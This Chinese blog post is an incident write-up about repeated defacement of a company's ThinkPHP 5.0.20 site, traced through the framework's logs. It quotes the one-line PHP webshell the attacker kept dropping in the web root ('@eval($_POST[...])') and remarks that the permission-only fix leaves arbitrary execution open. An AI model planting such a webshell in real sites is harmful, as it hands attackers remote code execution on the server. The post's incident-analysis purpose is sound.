本篇文章中,苏南大叔将要描述一个真实案例:黑客不知道通过什么方式,一直修改某公司的专题页面内容。某公司的运维大哥,急得头发都白了,连续N次被黑,饭碗马上就不保了。出于为兄弟排难解忧的目的,苏南大叔只好出马为他排查代码漏洞。

苏南大叔:真实黑客案例:thinkphp5网站一键变肉鸡 - thinkphp-bug-poc-hero
真实黑客案例:thinkphp5网站一键变肉鸡(图5-1)

拿到的这份代码就是基于thinkphp@5.0.20的,而且默认开启了thinkphplog日志功能。那么,最终的线索也就是从这里发现的。本来以为是老版本的漏洞呢,结果thinkphp@5.0.20这么新的版本里面,都存在着这么大的漏洞,真心是惊出一身冷汗啊。

漏洞描述

据运维兄弟描述,网站的根目录下面定期会生成一个名为xxx.php的文件,并且这个奇怪的.php文件打开之后,就是一个非常典型的一句话木马。

@eval($_POST[ggsmd]);

苏南大叔:真实黑客案例:thinkphp5网站一键变肉鸡 - thinkphp-trojan
真实黑客案例:thinkphp5网站一键变肉鸡(图5-2)

后记

虽然为运维找到了漏洞所在,不过他们还是仅仅通过修改权限的办法暂时做了处理,话说这漏洞可是可以执行任何函数的啊。人家不生成文件,就不能执行别的函数了么... 治标不治本啊...

不过目前,阿里云也会智能检测到异常请求,自动封锁IP,不过一样治标不治本。

总结

其实,本文的主要内容,是通过查看thinkphplog文件,苏南大叔在访客记录功能中发现这个非常邪门的入侵方式的。所以,站点日志还是比较有用的,对吧?更多thinkphp文章,请点击苏南大叔的博客:

如果本文对您有帮助,或者节约了您的时间,欢迎打赏瓶饮料,建立下友谊关系。
本博客不欢迎:各种镜像采集行为。请尊重原创文章内容,转载请保留链接作者。
本站采用创作共用版权协议, 要求署名、非商业用途和相同方式共享。
转载本站内容必须也遵循“署名-非商业用途-相同方式共享”的创作共用协议。
未经许可,规模化镜像抄袭本站内容的行为,将会根据有关法律法规进行维权。
程序如此灵动~》下所有原创文章,如被用于商业用途,请您按规定支付稿费。

 【加群】加入QQ群【175454274】和大家一起讨论这个问题

 【源码】本文代码片段及相关软件,请点此获取

 【绝密】秘籍文章入口,仅传授于有缘之人   php    thinkphp

本站的忠实读者小伙伴,正在阅读下面这些文章: